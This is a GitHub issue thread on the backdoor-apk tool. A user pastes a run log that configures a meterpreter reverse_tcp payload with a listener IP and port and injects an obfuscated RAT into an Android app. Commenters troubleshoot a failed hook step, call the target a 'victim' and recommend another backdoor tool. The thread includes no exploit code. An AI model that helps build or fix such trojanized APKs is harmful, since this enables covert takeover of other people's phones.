dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0
2.17k stars 699 forks source link

backdoor-apk error "Failed to add hook" #144

Closed steve01101 closed 5 years ago

steve01101 commented 6 years ago

1) meterpreter/reverse_http 4) shell/reverse_http 2) meterpreter/reverse_https 5) shell/reverse_https 3) meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 3 [?] Please enter an LHOST value: 52.14.61.47 [?] Please enter an LPORT value: 18120 [+] Android manifest permission options: 1) Keep original 2) Merge with payload and shuffle [?] Please select an Android manifest permission option: 1 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [*] Generating RAT APK file...done. [*] Decompiling original APK file...done. [+] Keeping permissions of original project [*] Running proguard on RAT APK file...done. [*] Decompiling obfuscated RAT APK file...done. [*] Creating new directories in original project for RAT smali files...done. [*] Copying RAT smali files to new directories in original project...done. [*] Fixing RAT smali files...done. [*] Obfuscating const-string values in RAT smali files...done. [*] Locating smali file to hook in original project...done. [*] Adding hook in original smali file..../backdoor-apk.sh: line 85: [: too many arguments done. [!] Failed to add hook

rameshdevalla commented 6 years ago

This is the biggest problem in this tool did you got the solution

steve01101 commented 6 years ago

I have version 2.3.1 of apktool, I do not understand why it does not work. what is the hook?

rameshdevalla commented 6 years ago

Hook means a file which gives connection between you and victim

rameshdevalla commented 6 years ago

For reverse connection

steve01101 commented 6 years ago

I solved by changing apk, but now there is another problem "Failed to recompile original project with backdoor"

rameshdevalla commented 6 years ago

Use evil-droid v ll get an backdoor apk without any flaws its pretty much bro I'm using that

steve01101 commented 6 years ago

ok thanks I can use evil-droid with msfconsole? and ngrok?

rameshdevalla commented 6 years ago

Yeah bro u can use

On Thu, Jul 19, 2018, 4:45 PM steve01101 notifications@github.com wrote:

ok thanks I can use evil-droid with msfconsole? and ngrok?

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/dana-at-cp/backdoor-apk/issues/144#issuecomment-406241677, or mute the thread https://github.com/notifications/unsubscribe-auth/AlUR_RcZPgleEFR23iqp8kq3z_PkeW58ks5uIGpMgaJpZM4VTZj2 .

steve01101 commented 6 years ago

are you serious? an error with evil-droid "Failed to verify signed artifacts"

steve01101 commented 6 years ago

I would like to use backdoor-apk. if someone knows how to fix my problem with backdoor-apk I will thank him

dana-at-cp commented 5 years ago

@steve01101 @rameshdevalla A new release is coming soon that resolves a number of issues.

dana-at-cp commented 5 years ago

@steve01101 @rameshdevalla Please try version 0.2.4 and let me know if the problem persists.

dana-at-cp commented 5 years ago

@steve01101 @rameshdevalla This should be fixed in versions 0.2.4 and 0.2.4a. Please reopen a new issue if you encounter the same problem.